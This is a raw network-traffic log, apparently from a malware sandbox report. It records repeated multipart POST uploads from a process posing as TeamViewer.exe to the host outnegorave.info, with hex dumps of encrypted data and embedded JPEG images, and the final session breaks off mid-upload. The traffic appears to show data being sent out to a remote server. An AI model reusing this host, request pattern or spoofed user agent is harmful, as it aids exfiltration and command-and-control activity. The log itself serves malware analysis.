                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2dvj%2B7Xb741Sr5e3Hksj2uvKmpAvI3oY0efw%2B241oILYuIvNE0%2FjegEHaphsU9pqEhVEpttKALtjejZnjPu6kAymQc%2FIQy5qFUWz45FW7anFRXlTILJlO7lR%2FmF1sHXerZJ1"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a6c1edd84ee5-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:53:15 UTC3292INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    4192.168.2.549761172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:02 UTC342OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84980
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------4273960975
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:02 UTC342OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 32 37 33 39 36 30 39 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------4273960975Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:02 UTC342OUTData Raw: b1 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 4b 14 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 9d bb fb 0f bd 80 17 0b 2b 94 2b f4 b7 66 1d b3 24 dd d1 5b ac c5 47 d8 09 b3 88 c4 ba 2e f6 a6 3a 2c 9c 8f 72 49 a7 8c 9e 60 9f bf d3 6c a7 bd c1 c6 2b ca 0d 24 15
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^K;ZV}}h-^fcK++f$[G.:,rI`l+$
                                                                                                                                    2021-09-15 11:52:02 UTC342OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:02 UTC358OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:52:02 UTC374OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
                                                                                                                                    2021-09-15 11:52:02 UTC390OUTData Raw: 51 8a 62 16 96 92 8a 62 03 4a 29 29 45 00 28 a4 a5 14 86 98 82 96 92 81 48 07 0a 70 a6 d2 d5 21 31 68 a4 a5 a6 02 d1 45 14 12 2d 14 51 4c 02 8a 28 a0 43 85 2d 34 52 8a 68 05 a5 a4 a5 a6 48 52 d2 52 8a 60 2d 14 51 4c 42 d1 49 4b 40 82 96 92 96 9a 01 d4 52 0a 5a 64 85 28 a2 8a 60 2d 14 0a 5a 62 12 92 96 8a 00 41 d6 9f 4c 1d 69 f4 20 61 41 a2 8a 64 80 a5 a4 14 ec 50 81 8a 05 3a 9b 4e 15 48 96 27 7a 5a 43 d6 9c 29 80 82 9d 4d a5 14 c4 c5 a2 8a 28 10 0a 5a 41 4e a6 21 29 d4 94 53 06 3a 96 9a 29 69 92 3b 34 a2 9b 4a 29 a1 31 c2 96 9b 4e 14 c9 61 4b 49 45 31 0b 45 25 2d 00 14 b4 94 b4 00 b4 b4 da 75 02 61 4a 29 29 68 10 b4 52 52 d0 20 a5 a2 8a 60 14 a2 8a 51 40 98 b4 0a 4a 51 40 8d 0d 24 7e fd cf a2 1a ac 7a 9f ad 5a d2 7f d7 49 fe e9 aa a7 a9 fa d6 4b e3 61 3f
                                                                                                                                    Data Ascii: QbbJ))E(Hp!1hE-QL(C-4RhHRR`-QLBIK@RZd(`-ZbALi aAdP:NH'zZC)M(ZAN!)S:)i;4J)1NaKIE1E%-uaJ))hRR `Q@JQ@$~zZIKa?
                                                                                                                                    2021-09-15 11:52:02 UTC406OUTData Raw: 4c 05 a5 a6 d2 d0 21 c2 8a 4a 5a a1 0a 29 69 b9 a5 a6 21 d9 a5 a6 d2 d0 21 c2 94 53 69 41 aa 4c 96 48 28 a4 06 8a a4 48 b4 b4 94 66 98 58 5c d1 9a 41 4b 45 c5 61 45 2e 69 94 b9 a7 70 b0 fc d2 d3 33 4b 9a 64 d8 70 a5 cd 37 34 53 b8 58 7e 68 cd 37 34 6e f6 a2 e2 b1 20 34 b9 a8 f7 1f 5a 33 ef 4e e2 b1 26 45 19 a8 f3 4b 9a 2e 2b 0f cd 19 a6 e6 8c d3 b8 58 75 2e 69 b4 66 8b 8a c3 b3 4b 9a 66 68 cd 3b 85 87 e6 8c d3 37 52 6e a2 e1 ca 49 9a 33 51 ee a3 75 2b 87 29 26 ea 4d d5 11 7a 69 7a 1c 86 a0 4c 5a 9a 5e a2 2f 4d 2d 52 e6 52 81 29 7a 61 7a 8c b5 30 b5 43 91 6a 04 85 fd e9 85 a9 85 a9 85 aa 1c 8d 14 47 96 a6 16 a6 96 a6 16 ac dc 8d 14 47 13 4c 26 90 9a 4a 86 cb 48 52 69 29 28 cd 26 3b 08 68 a0 d3 6a 4a 41 9a 29 29 29 5c 76 28 63 bd 2d 25 15 ca 75 8b 45 14 62
                                                                                                                                    Data Ascii: L!JZ)i!!SiALH(HfX\AKEaE.ip3Kdp74SX~h74n 4Z3N&EK.+Xu.ifKfh;7RnI3Qu+)&MzizLZ^/M-RR)zaz0CjGGL&JHRi)(&;hjJA)))\v(c-%uEb
                                                                                                                                    2021-09-15 11:52:02 UTC422OUTData Raw: 16 51 fd 1b f4 fa 53 3c 41 f0 e3 51 b0 dd 36 94 c6 fa 01 ce c0 31 2a 8f a7 f1 7e 1c fb 57 41 e1 1f 03 68 66 d6 3b eb 99 7f b4 64 3d 51 97 6a 46 dd d4 a7 5c 8e e1 bf 2a 40 79 5c d1 49 04 ad 14 f1 bc 72 21 c3 23 a9 04 1f 70 69 95 d1 fc 42 44 8f c6 b7 e9 1a aa 22 88 80 55 18 00 79 49 5c e5 50 82 ad e9 b6 4d 7d 74 23 07 6a 0e 5d bd 05 54 ae 83 c2 fb 71 72 0f 5f 97 f2 e6 a6 4e cb 42 2a 54 54 d7 3b 57 b1 b9 67 a3 5b 84 d9 6d 66 24 da 39 25 37 1f c6 ab ea 1e 1c 17 0a c2 3b 56 86 61 d0 aa 11 f9 8a dd 1b ff 00 b3 6d c4 59 31 8c ef c7 f7 f3 df f0 c5 6d e9 be 6f d8 53 cf ce ec 9d bb ba ed ed fd 6b 0c 4d 29 50 c3 ac 42 96 bd 8f 46 18 ea 75 a7 ec a3 0f 74 f1 69 a2 78 26 78 a5 52 ae 84 ab 03 d8 d3 2b 6b c6 3e 5f fc 25 17 be 56 31 b9 73 8f 5d a3 3f ad 62 d6 d4 e5 cf 05
                                                                                                                                    Data Ascii: QS<AQ61*~WAhf;d=QjF\*@y\Ir!#piBD"UyI\PM}t#j]Tqr_NB*TT;Wg[mf$9%7;VamY1moSkM)PBFutix&xR+k>_%V1s]?b
                                                                                                                                    2021-09-15 11:52:02 UTC425OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 32 37 33 39 36 30 39 37 35 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------4273960975--
                                                                                                                                    2021-09-15 11:52:03 UTC425INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:03 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=23ba21015cb0d0d1794a58df9fd074408ab87009869b5e65513202a391036b35; expires=Thu, 15-Sep-2022 11:52:02 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=XpV4DbjPIAOwEPkfOdFjfkKlyuxYvbB3gFh4iiozYqjt30Na97RaG5RUXEI6CxfhJsthLnw4x%2Bb9mEosgmTmjM86Z14w7PBLIXGaKN01r8TfLupU23eryVxvK4lc%2FF0uMEZJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a5883d0a68ec-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:03 UTC426INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    5192.168.2.549762172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:04 UTC426OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84976
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------1234881971
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:04 UTC426OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 32 33 34 38 38 31 39 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------1234881971Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:04 UTC427OUTData Raw: b1 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 4f 14 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 9d bb fb 0f bd 80 17 0b 2b 94 2b f4 b7 66 1d b3 24 dd d1 5b ac c5 47 d8 09 b3 88 c4 ba 2e f6 a6 3a 2c 9c 8f 72 49 a7 8c 9e 60 9f bf d3 6c a7 bd c1 c6 2b ca 0d 24 15
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^O;ZV}}h-^fcK++f$[G.:,rI`l+$
                                                                                                                                    2021-09-15 11:52:04 UTC427OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:04 UTC443OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:52:04 UTC459OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
                                                                                                                                    2021-09-15 11:52:04 UTC475OUTData Raw: a2 92 94 50 02 8a 4a 51 48 69 88 29 69 28 14 80 70 a7 0a 6d 2d 52 13 16 8a 4a 5a 60 2d 14 51 41 22 d1 45 14 c0 28 a2 8a 04 38 52 d3 45 28 a6 80 5a 5a 4a 5a 64 85 2d 25 28 a6 02 d1 45 14 c4 2d 14 94 b4 08 29 69 29 69 a0 1d 45 20 a5 a6 48 52 8a 28 a6 02 d1 40 a5 a6 21 29 29 68 a0 04 1d 69 f4 c1 d6 9f 42 06 14 1a 28 a6 48 0a 5a 41 4e c5 08 18 a0 53 a9 b4 e1 54 89 62 77 a5 a4 3d 69 c2 98 08 29 d4 da 51 4c 4c 5a 28 a2 81 00 a5 a4 14 ea 62 12 9d 49 45 30 63 a9 69 a2 96 99 23 b3 4a 29 b4 a2 9a 13 1c 29 69 b4 e1 4c 96 14 b4 94 53 10 b4 52 52 d0 01 4b 49 4b 40 0b 4b 4d a7 50 26 14 a2 92 96 81 0b 45 25 2d 02 0a 5a 28 a6 01 4a 28 a5 14 09 8b 40 a4 a5 14 08 d0 d2 47 ef dc fa 21 aa c7 a9 fa d5 ad 27 fd 74 9f ee 9a aa 7a 9f ad 64 be 36 13 f8 50 51 45 15 a1 90 52 d2 52
                                                                                                                                    Data Ascii: PJQHi)i(pm-RJZ`-QA"E(8RE(ZZJZd-%(E-)i)iE HR(@!))hiB(HZANSTbw=i)QLLZ(bIE0ci#J))iLSRRKIK@KMP&E%-Z(J(@G!'tzd6PQERR
                                                                                                                                    2021-09-15 11:52:04 UTC491OUTData Raw: 40 68 aa 44 8b 4b 49 46 69 85 85 cd 19 a4 14 b4 5c 56 14 52 e6 99 4b 9a 77 0b 0f cd 2d 33 34 b9 a6 4d 87 0a 5c d3 73 45 3b 85 87 e6 8c d3 73 46 ef 6a 2e 2b 12 03 4b 9a 8f 71 f5 a3 3e f4 ee 2b 12 64 51 9a 8f 34 b9 a2 e2 b0 fc d1 9a 6e 68 cd 3b 85 87 52 e6 9b 46 68 b8 ac 3b 34 b9 a6 66 8c d3 b8 58 7e 68 cd 33 75 26 ea 2e 1c a4 99 a3 35 1e ea 37 52 b8 72 92 6e a4 dd 51 17 a6 97 a1 c8 6a 04 c5 a9 a5 ea 22 f4 d2 d5 2e 65 28 12 97 a6 17 a8 cb 53 0b 54 39 16 a0 48 5f de 98 5a 98 5a 98 5a a1 c8 d1 44 79 6a 61 6a 69 6a 61 6a cd c8 d1 44 71 34 c2 69 09 a4 a8 6c b4 85 26 92 92 8c d2 63 b0 86 8a 0d 36 a4 a4 19 a2 92 92 95 c7 62 86 3b d2 d2 51 5c a7 58 b4 51 46 28 00 a2 8a 28 10 b4 51 49 40 05 14 51 40 05 2d 25 2d 00 14 51 45 02 0a 28 a2 98 05 14 51 40 05 2d 14 50 01
                                                                                                                                    Data Ascii: @hDKIFi\VRKw-34M\sE;sFj.+Kq>+dQ4nh;RFh;4fX~h3u&.57RrnQj".e(ST9H_ZZZDyjajijajDq4il&c6b;Q\XQF((QI@Q@-%-QE(Q@-P
                                                                                                                                    2021-09-15 11:52:04 UTC507OUTData Raw: b0 dd 36 94 c6 fa 01 ce c0 31 2a 8f a7 f1 7e 1c fb 57 41 e1 1f 03 68 66 d6 3b eb 99 7f b4 64 3d 51 97 6a 46 dd d4 a7 5c 8e e1 bf 2a 40 79 5c d1 49 04 ad 14 f1 bc 72 21 c3 23 a9 04 1f 70 69 95 d1 fc 42 44 8f c6 b7 e9 1a aa 22 88 80 55 18 00 79 49 5c e5 50 82 ad e9 b6 4d 7d 74 23 07 6a 0e 5d bd 05 54 ae 83 c2 fb 71 72 0f 5f 97 f2 e6 a6 4e cb 42 2a 54 54 d7 3b 57 b1 b9 67 a3 5b 84 d9 6d 66 24 da 39 25 37 1f c6 ab ea 1e 1c 17 0a c2 3b 56 86 61 d0 aa 11 f9 8a dd 1b ff 00 b3 6d c4 59 31 8c ef c7 f7 f3 df f0 c5 6d e9 be 6f d8 53 cf ce ec 9d bb ba ed ed fd 6b 0c 4d 29 50 c3 ac 42 96 bd 8f 46 18 ea 75 a7 ec a3 0f 74 f1 69 a2 78 26 78 a5 52 ae 84 ab 03 d8 d3 2b 6b c6 3e 5f fc 25 17 be 56 31 b9 73 8f 5d a3 3f ad 62 d6 d4 e5 cf 05 2e e8 e2 92 b3 68 28 a2 96 ac 41 49
                                                                                                                                    Data Ascii: 61*~WAhf;d=QjF\*@y\Ir!#piBD"UyI\PM}t#j]Tqr_NB*TT;Wg[mf$9%7;VamY1moSkM)PBFutix&xR+k>_%V1s]?b.h(AI
                                                                                                                                    2021-09-15 11:52:04 UTC509OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 32 33 34 38 38 31 39 37 31 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------1234881971--
                                                                                                                                    2021-09-15 11:52:04 UTC509INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:04 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=8490ae67c582642b596f68028a5e386c5d93dc82432e967e5164766534f9ddc7; expires=Thu, 15-Sep-2022 11:52:04 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FHRfFjvvsvkqAxO29INwRQNNahZ%2F0vOp%2FD1TV0FBJR%2FMZWD7zFUOgkNs9cQRI2tfbyZ1HFlzxRCEiQdjTYB9wDYZYdhdThckiLtxcOLOrVM%2FF6xanGrX9ViyVqHy8vtWMxhf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a59149631f39-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:04 UTC510INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    6192.168.2.549763172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:05 UTC510OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84926
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------3962184161
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:05 UTC511OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 39 36 32 31 38 34 31 36 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
